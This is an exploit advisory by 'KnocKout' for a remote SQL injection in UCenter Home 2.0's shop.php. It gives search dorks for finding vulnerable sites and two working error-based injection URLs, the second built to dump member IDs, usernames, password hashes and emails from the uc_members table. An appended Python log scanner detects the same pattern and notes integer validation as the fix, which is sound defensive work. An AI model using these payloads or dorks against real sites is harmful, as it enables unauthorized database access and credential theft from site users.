__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerability Type : SQL Injection (MySQL Error Based)

Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
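
Detection example (added here, not part of the original advisory or of UCenter Home): a log scanner that flags requests to shop.php whose shopid is not a plain integer and labels the floor(rand(0)*2) / group by error-based pattern shown above. It assumes a combined-format access log; the function names, marker names and sample log lines are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the error-based pattern in the advisory (names are this example's own).
MARKERS = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "hex_literal": re.compile(r"0x[0-9a-f]{2,}", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_shopid(value):
    """Return (verdict, matched_markers) for one decoded shopid value."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return "ok", []
    hits = [name for name, rx in MARKERS.items() if rx.search(value)]
    if "floor_rand" in hits and "group_by" in hits:
        return "error-based-sqli", hits
    return ("sqli-suspect" if hits else "non-numeric"), hits

def scan(log_lines):
    """Return (line_number, verdict, markers) for each suspicious shop.php request."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/shop.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
            verdict, hits = classify_shopid(value)
            if verdict != "ok":
                findings.append((n, verdict, hits))
    return findings

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 640',
    '198.51.100.7 - - [01/Jan/2024:10:00:11 +0000] "GET /space.php?uid=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule used in classify_shopid is the server-side fix: a shopid that is cast or validated as an integer before it reaches the query cannot carry this payload.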